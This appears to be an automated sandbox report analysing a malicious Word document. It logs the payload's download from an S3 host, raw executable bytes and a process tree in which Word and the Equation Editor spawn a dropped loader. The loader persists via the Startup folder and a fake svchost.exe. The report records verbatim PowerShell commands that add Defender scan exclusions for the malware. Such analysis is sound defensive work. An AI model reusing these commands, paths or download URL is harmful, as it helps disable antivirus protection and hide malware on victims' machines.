                                                  Host: miolouno.s3-us-west-2.amazonaws.com
                                                  Connection: Keep-Alive
                                                  May 4, 2021 20:31:10.101667881 CEST1INHTTP/1.1 200 OK
                                                  x-amz-id-2: DS7QrdmdJpyib1F1w8LPzDqd7RTzrfjUtXZKXhrpOuBqbV8xuHGgC7n/1gKtnvkdl880SC70WW0=
                                                  x-amz-request-id: S238G7R11599EGD7
                                                  Date: Tue, 04 May 2021 18:31:10 GMT
                                                  Last-Modified: Tue, 04 May 2021 10:51:11 GMT
                                                  ETag: "d96f52fc8733d2f4a127bdc44d4ceb25"
                                                  x-amz-version-id: IAoppdQmXchpR2n3EPNrNxP0ggf842rd
                                                  Accept-Ranges: bytes
                                                  Content-Type: application/x-msdownload
                                                  Content-Length: 3367424
                                                  Server: AmazonS3
                                                  May 4, 2021 20:31:10.101728916 CEST2INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELA"0X3.v3 3@ 3@
                                                  May 4, 2021 20:31:10.101777077 CEST3INData Raw: 0b 00 30 00 00 00 07 00 00 11 8c 10 00 00 01 00 03 2c 0b 02 7b 04 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 04 00 00 04 6f 19 00 00 0a 00 00 02 03 28 1a 00 00 0a 00 2a 13 30 0c 00 3c 00 00 00 00 00 00 00 8c 10 00 00 01 00 02 73 1b 00 00 0a
                                                  Data Ascii: 0,{+,{o(*0<s}( s(r493po*09~,"r@93p( o!s"~+*0~+*0~
                                                  May 4, 2021 20:31:10.101826906 CEST4INData Raw: 72 63 65 73 2e 52 65 73 6f 75 72 63 65 52 65 61 64 65 72 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37
                                                  Data Ascii: rces.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSetPADPADPBSJBv4.0.30319l<#~#Strings\x93#USN3#GUI
                                                  May 4, 2021 20:31:10.101876974 CEST6INData Raw: 00 d6 00 40 00 0b 00 4b 00 49 00 33 00 d6 00 84 00 13 00 4b 00 e3 00 1b 00 8f 00 e3 00 23 00 4b 00 e3 00 2b 00 4b 00 03 01 2b 00 4b 00 03 01 1b 00 df 00 39 01 3e 01 83 01 a1 01 aa 01 b4 01 b8 01 d3 01 f2 01 f7 01 07 00 01 00 08 00 03 00 00 00 0d
                                                  Data Ascii: @KI3K#K+K+K9>qmvCDz#6
                                                  May 4, 2021 20:31:10.101933002 CEST7INData Raw: 2e 46 6f 72 6d 73 00 67 65 74 5f 43 68 61 72 73 00 43 6f 6e 63 61 74 00 4f 62 6a 65 63 74 00 53 70 6c 69 74 00 43 6f 6e 76 65 72 74 00 73 65 74 5f 54 65 78 74 00 54 6f 41 72 72 61 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 6f 70 5f 45 71 75 61
                                                  Data Ascii: .Formsget_CharsConcatObjectSplitConvertset_TextToArrayget_Assemblyop_Equality
                                                  May 4, 2021 20:31:10.101990938 CEST8INData Raw: d5 ab d5 ac d5 af d6 99 d6 89 d6 9c d5 aa d5 ae d6 85 d6 a1 d6 98 d6 9d d6 9b d5 bd d6 9b d5 af d6 a9 d5 af d5 bb d6 85 d6 9d 00 e2 a0 a4 e2 a1 90 e2 a0 a1 e2 a0 a2 e2 a0 a2 e2 a1 94 e2 a0 9e e2 a0 a2 e2 a0 a2 e2 a1 82 e2 a1 94 e2 a1 92 e2 a0 9f
                                                  Data Ascii:
                                                  May 4, 2021 20:31:10.102032900 CEST10INData Raw: bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd ef bf bd
                                                  Data Ascii:
                                                  May 4, 2021 20:31:10.102086067 CEST11INData Raw: 20 00 55 00 20 00 55 00 20 00 55 00 20 00 7a 00 4d 00 43 00 20 00 4e 00 20 00 55 00 20 00 55 00 20 00 43 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 43 00 20 00 55 00 20 00 4d 00 71 00 20 00 7a 00 73 00 73 00
                                                  Data Ascii: U U U zMC N U U C U U U U U U C U Mq zss U U zq U U zq U U U U zq U U zq U U U U U U zq U U U U U U U U U U U zqH zzq N U
                                                  May 4, 2021 20:31:10.102129936 CEST13INData Raw: 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 43 00 43 00 48 00 20 00 7a 00 7a 00 71 00 20 00 4e 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00 61 00 43 00 20 00 55 00 20 00 55 00 20 00 55 00 20 00
                                                  Data Ascii: U U U U U U CCH zzq N U U U U U aC U U U C U g U zCU CCa s U HH zHg H U s U C U zga U U q zNH zCq U U zMC zUU s U U U U U
                                                  May 4, 2021 20:31:10.134949923 CEST14INData Raw: 20 00 55 00 20 00 48 00 20 00 48 00 55 00 20 00 67 00 73 00 20 00 55 00 20 00 55 00 20 00 71 00 20 00 48 00 55 00 20 00 67 00 48 00 20 00 55 00 20 00 55 00 20 00 71 00 20 00 48 00 55 00 20 00 7a 00 43 00 20 00 55 00 20 00 55 00 20 00 48 00 73 00
                                                  Data Ascii: U H HU gs U U q HU gH U U q HU zC U U Hs zCN ss U U H HU gg U U q HU gq U U q HU zs U U Hs zCN sH U U H HC zqq HU zgU U U


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: WINWORD.EXE PID: 1796 Parent PID: 584

                                                  General

                                                  Start time:20:30:37
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                  Imagebase:0x13f520000
                                                  File size:1424032 bytes
                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: EQNEDT32.EXE PID: 1296 Parent PID: 584

                                                  General

                                                  Start time:20:30:38
                                                  Start date:04/05/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: CTF loader_es.exe PID: 2336 Parent PID: 1296

                                                  General

                                                  Start time:20:30:43
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal, Browse
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2536 Parent PID: 2336

                                                  General

                                                  Start time:20:30:49
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2300 Parent PID: 2336

                                                  General

                                                  Start time:20:30:50
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2772 Parent PID: 2336

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2852 Parent PID: 2336

                                                  General

                                                  Start time:20:30:51
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 2368 Parent PID: 2336

                                                  General

                                                  Start time:20:30:56
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 41%, Virustotal, Browse
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2252 Parent PID: 2336

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 3064 Parent PID: 2336

                                                  General

                                                  Start time:20:30:57
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 920 Parent PID: 2336

                                                  General

                                                  Start time:20:30:58
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x21e00000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 1192 Parent PID: 1388

                                                  General

                                                  Start time:20:31:00
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
                                                  Imagebase:0x10b0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: CTF loader_es.exe PID: 2444 Parent PID: 2336

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 1552 Parent PID: 2368

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 660 Parent PID: 2368

                                                  General

                                                  Start time:20:31:08
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2812 Parent PID: 2368

                                                  General

                                                  Start time:20:31:09
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: CTF loader_es.exe PID: 2788 Parent PID: 2336

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Imagebase:0x2e0000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2804 Parent PID: 2368

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: svchost.exe PID: 2916 Parent PID: 1388

                                                  General

                                                  Start time:20:31:13
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
                                                  Imagebase:0xb20000
                                                  File size:3367424 bytes
                                                  MD5 hash:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 19%, Metadefender, Browse
                                                  • Detection: 45%, ReversingLabs

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2920 Parent PID: 1192

                                                  General

                                                  Start time:20:31:14
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2300 Parent PID: 1192

                                                  General

                                                  Start time:20:31:15
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 2760 Parent PID: 1192

                                                  General

                                                  Start time:20:31:16
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Analysis Process: powershell.exe PID: 1900 Parent PID: 1192

                                                  General

                                                  Start time:20:31:17
                                                  Start date:04/05/2021
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
                                                  Imagebase:0x22000000
                                                  File size:452608 bytes
                                                  MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: CTF loader_es.exe PID: 2336 Parent PID: 1296 CTF loader_es.exeCOMMON

                                                    Executed Functions

                                                    Function 001D0490, Relevance: 6.5, Strings: 5, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fCl$fCl$fCl$fCl$fCl
                                                    • API String ID: 0-2453322616
                                                    • Opcode ID: 22a6cda653a49977320e00c0361e52e2e68bb1cfc5f148b5a9bf56afa2e0d025
                                                    • Instruction ID: 31b7cd7197950fd6df890b2803e260190f793189762c5ac587cb4b2bec84e43b
                                                    • Opcode Fuzzy Hash: 22a6cda653a49977320e00c0361e52e2e68bb1cfc5f148b5a9bf56afa2e0d025
                                                    • Instruction Fuzzy Hash: C591BE74B001099FCB08EBB4D855AAEB7B7AFC8304F248529E91597399DB349D42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D0457, Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fCl$fCl$fCl$fCl$fCl
                                                    • API String ID: 0-2453322616
                                                    • Opcode ID: 4439b5a9f19b7014f946f336b75635bb77550776a05ccc48dd0c2e76a6be33b1
                                                    • Instruction ID: 1af78a1205032008b2e9349d50a3f658c0df2af0ed6400691b0c8f3fedc2af13
                                                    • Opcode Fuzzy Hash: 4439b5a9f19b7014f946f336b75635bb77550776a05ccc48dd0c2e76a6be33b1
                                                    • Instruction Fuzzy Hash: C981F134B042459FCB09DB749CA5AAF7BB7EF89300F14846AD901DB39ADB349C06CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D0C80, Relevance: .4, Instructions: 373COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b5ef45a4f0ecf81c0d52a8731c80f6eddd4b0ab21f2035be8e5e76c13debe96
                                                    • Instruction ID: 0b193c07a7438651356aec02209dbc22af2fde492c513d5aa161f26e25b7df92
                                                    • Opcode Fuzzy Hash: 6b5ef45a4f0ecf81c0d52a8731c80f6eddd4b0ab21f2035be8e5e76c13debe96
                                                    • Instruction Fuzzy Hash: 7DE16134600204DFCB1DABB0E96DB6A77B2FF48309F11592AF606972A8DF359885CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D4854, Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4A96
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: c4b48d597fc7b53877eb485f354face8835fffa5f940619ec1d8646a26b95c12
                                                    • Instruction ID: 5406aa58dc05744a333327539b0098cb10820882e87ff00f381fd5023f12046f
                                                    • Opcode Fuzzy Hash: c4b48d597fc7b53877eb485f354face8835fffa5f940619ec1d8646a26b95c12
                                                    • Instruction Fuzzy Hash: 8AA15971D00219CFDF24CFA9C8917EEBBB2BF48314F14856AD848A7244DB749985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D4860, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4A96
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: ed72365187cc02feecbd20a1f16739dc5ec8c1665524a8ed421c21fc29cd9125
                                                    • Instruction ID: bcd58bcd2464cfc60a37109a0a4c2b81c2b77a9cbbde47af57650831367a14a3
                                                    • Opcode Fuzzy Hash: ed72365187cc02feecbd20a1f16739dc5ec8c1665524a8ed421c21fc29cd9125
                                                    • Instruction Fuzzy Hash: B5914871D00219DFDF24CFA9C8917EEBBB2BF48318F14856AE848A7244DB749985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D42C1, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D4348
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 0f0f6408ab5b17dd4358c5d5834e7ad8e4b8464ffaa81534df613d7525894ce4
                                                    • Instruction ID: 8a27063c1267caf1d053827186081e3f4fe5d2e2b3fd82a359a4fb4fbc8a4a74
                                                    • Opcode Fuzzy Hash: 0f0f6408ab5b17dd4358c5d5834e7ad8e4b8464ffaa81534df613d7525894ce4
                                                    • Instruction Fuzzy Hash: AB2107719002599FCB10CFA9D884BEEBBF5FF48310F54882AD559A7240D779A911CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

